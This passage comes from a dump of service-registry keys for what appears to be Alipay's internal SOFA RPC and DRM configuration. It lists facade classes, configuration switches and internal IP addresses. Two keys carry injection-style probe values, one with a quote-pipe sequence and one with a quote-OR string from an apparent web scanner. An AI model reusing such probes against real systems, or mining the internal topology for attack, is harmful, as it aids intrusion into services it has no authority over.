DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.1.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:zhimago_sign_Success@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.42.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_O_CRM_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbsettle.service.facade.common.api.query.SettleContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:accountcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_CONSUME_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCacheCZone.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.112.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.87.216#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.96.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_AGMCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincontrolcenter.common.service.facade.roadmap.StrategyRiskQueryFacade:1.0:fincontrolcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emcooperate.common.service.facade.hbase.HbaseHelperFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.226.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:yqdataservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.integration.baoxiancore.CoreReportSearchServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.biz.point.service.common.CommonPointAchievementService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.inner.GiftCrowdRzReceiveService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.salesmng.common.service.facade.charge.OrderLinkNotifyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCLOANINSIGHT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.prodquery.client.Config.isRemoteService,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.kmi.common.service.client.api.KmiCertClientApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.ordermng:name=com.alipay.fc.arcore.degrade.whit.list.degradeProductWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.merchant.common.service.facade.MerchantQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeviceprod.common.service.facade.appmgmt.AppQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.dweg:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyActions,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.dont-load-plugin:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clive.common.service.facade.api.CompRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:mobilesearcTermReview@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanApplyDrmResource.daProdSceneSwitchOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fcrcportal:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.pdcore.common.service.clientcache.innerclient.slaver.api.InnerClientSlaverFacade:1.0:zarcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.service.facade.quality.ReplayFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.criskcenter.common.service.facade.buc.BucUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.InstOweInfoQueryCallbackFacade:1.0:echannelcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.arcstudio.common.service.facade.MixClusterAppFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.publiccore.common.service.facade.shop.PermissionCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instservice.common.service.facade.instserviceconfig.IscAbilityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmResourceTrigger.supportCertTypeStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofa-practice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\"|\"ld@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_PCREDITBILL_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.psslip.facade.api.SlipConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:jobOpsCloudExecutionCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebppprod.CZRouteSetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recmixer.common.service.facade.CategoryRecServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.fc.arcore.abtest.openSaveParam,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcbmarketcenter:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.sampleRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acrescore.facade.LevelCostFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iecpprod.common.service.facade.api.VaApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ordermng:name=com.alipay.echox.drm.EchoxSpecialDrm.ambushSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bizprodmng:name=com.alipay.mitemcenter.common.service.facade.utils.ldc.ICLdcRzDrm.ldcRZoneOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfocore.common.service.facade.cds.mng.StrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.stepcounter.SportsStepQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdatafront.common.service.facade.commonquery.CommonQueryService:1.0:sspsc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.material.InsIopDynamicTagMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.integration.fundselling.ProductXStockFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.25.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.fc.pointcore.facade.api.point.PointQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.acoffercenter.common.service.facade.price.PriceTestCaseManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.service.inspect.msgbroker.ObeliskFailureHandlerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.OrderServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.yebscene.admin.YebcCampPrizePlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:openhome@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iopencore.common.service.manager.InterfaceDefinitionDTOManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findefencecore.common.service.accm.facade.AccmCheckRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbshopdecorate.common.service.facade.kbserv.decorate.DecorateBizOrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:secure-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.test:name=com.alipay.fc.iriskperceptcenter.rpoints.drm.RpointsCommonConfigResource.keplerJobSubmitConfigStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.application:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ecoqltprod.core.service.eco.EcoTinyappPageDetectFailureDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.162.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.customerv2.smartFoParams,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:recruitcore_enrollAuditEndCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.cloudinc.cloudincDatasource.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kabaoprod.biz.mwallet.pass.manager.GroupPassManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.prod.mng.ServProdInstService:1.0:incService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.rabbit.common.service.facade.RabbitUtilFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdabombardier.common.service.facade.bpaas.BPaaSClientInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.linglongmng.presentation.rpc.TestRpcFacade:1.0:600003@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbcontent.common.service.facade.api.author.AuthorQueryForManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paychecker:name=com.alipay.zcache.tbase.paycheckerCZTBaseCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapires.biz.api.manager.ApiSyncToTopManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tbase.TBaseClusterNewFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finslip.biz.service.impl.mock.DaysSplitFacadeMock:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ifcidentitycloudus:name=com.antcloud.ifcidentitycloudus.common.util.mic.PubResouceHolder.changeKybStatusByServiceCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.erecon.common.service.facade.fund.api.item.ErcInstItemEditService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.122.110#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finassetcore.common.service.assetcore.zcb.facade.ZcbAssetDetailQueryRzFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antinvoice_merchantEnterAuditFailCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.23.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.dispatch.ResourceGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rdf.gray.config.facade.service.RdfGrayConfigQueryService:1.0:finscprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:logrotator-app-hour-custom_hourdelimiter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afts.common.service.facade.MerchantImageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:zimtmsvcprod_notReceive_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbordersync.common.service.facade.spi.OrderPushProcessCallback:1.0:koubei-box@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.api.UserAppInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.224.252#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sdabombardier.common.service.facade.bpaas.BPaaSAppManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.facade.OuterDataQueryService:1.0:ins_marketing@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:insusercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.240.253#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fcbuservice.common.service.facade.GroupActionFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.182.146#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdalhbase:name=com.alipay.zdal.ldc.hbase.recse.update,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antlogmng.common.service.facade.tinyapp.TinyAppEventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.182.193#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.159.216#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.groot:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.clientpublish.drm.ClientPublishDRMImpl.clientUpgradeMaxRandomTimeDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.exratecenter.service.facade.api.ExAgreementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.audit.MiniAppCacAuditConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openauth.common.service.facade.authtoken.AppToAppAuthFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:insautobff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iamlmng.core.service.common.interfaces.CustMonitorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.biz.service.gw.community.api.friendships.FriendshipsManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.inslifeprod.common.facade.open.InsLifeOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.securitydata.biz.decision.manager.mct.MctDecisionLogManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:bizfundprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeprod.service.facade.SignContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.common.service.facade.changecode.ChangeCodeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.taskcenter.SubTaskServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:promocenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.StarWishUnitedDrm.swSceneTransFlowRecord,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilesearch.common.service.facade.manage.EcologicalRiskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_EBPP_DEDUCT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.afsc.common.service.assistinvestigate.principal.facade.PrincipalService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.facade.PolicyFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_EQUITYMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.idatacontextTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finscenestarwish.common.service.facade.api.FinsStarWishTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.122.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.datacaptain.operate.OperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:lendpofprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.imif.common.service.facade.api.MerchantClassificationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.pointmng:name=com.alipay.common.webx.session.drm.SessionLogDrm.isPrintDetails,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.reservemng.service.facade.profit.api.InterestRateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.fcbuservice.common.service.facade.GroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.mybank.bkloansupport.common.service.facade.collection.AlibabaPDFSignSignApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.112.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.auditprod.common.service.facade.fund.api.BizAppRelationQueryFacade:1.0:auditprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CICADA#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:publicDomain_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:uemprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:xyz'\\tOr\\tantwebscansYW50=ODAxMDIwNTMtdW5pcXVlSWQtMTEwMDAyMDIy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.WorkbenchAdvisorDataMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:tr-server-middleware@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.common.service.facade.ForexChargeWService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.QcTrainTagFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:pcreditauthcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:lendweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.wealthdecisionsys.facade.AlarmNotifySubFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.core.drm.CoreOrderExecuteDRMResource.unFinishedStatistics,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csrobotmng.rest.ModelRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.koubei.kbbusinessprod.common.service.facade.api.SwitchPropAddFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.retained.api.FixRetainedStrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:finquotationcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.conf.ZProxyConfigFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finresprod.service.facade.api.card.UnionCardQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundcardprod.common.service.fundcard.FundCardCzoneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:aaa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.account.register.RegisterAndCertifyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scheduler.common.service.facade.query.SchedulerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.reply.ReplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:weavercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.recruit.RecruitPlanQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.biz.service.ops.OpsService:1.0:questionInsertOpsService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.32.80#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.aclinkelib.common.service.facade.RiskControlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordercore:name=com.alipay.ordercore.drop.level.handleCancelArByReject,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.qconsole.facade.openapi.conf.MqTopicSubConfigFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.176.171#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.equitytradecore.common.service.facade.mng.TradeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.facade.EngineSearchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.product.spi.SecurityProductService:1.0:bio@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdecision.common.service.facade.api.PlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:verify_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.scenemsg.MsgGenTaskMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.offer.OfferInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.user.service.FundQualifiedUserCertifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcactivitycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.superapi.common.core.client.processor.InvokeProcessor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icsmng.service.facade.customer.card.CustomerCardUserQueryClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.channelspop.service.decision.opportunity.facade.OpportunityConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.auditprod.common.service.facade.fund.api.CheckPointQueryFacade:1.0:auditprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.mobilesession.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:fincontentmngweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ordermng.common.service.api.task.GroupOrderSystemService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.einvoice.prod.facade.service.EinvoiceAgentService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.customerv2_dest.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:pledgecoreAssetPrepareService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mychain.z.did.facade.auth.ZkAuthServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchopmng.merchant.common.service.facade.api.CrmLabelManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:yebAssetFlux@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.33.135#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.162.180#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:csmobilebff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.service.facade.api.DivideQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:zdataconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.spi.OperationConfigCallbackFacade:1.0:paygrowth_twophase_strategy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.153.218#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUT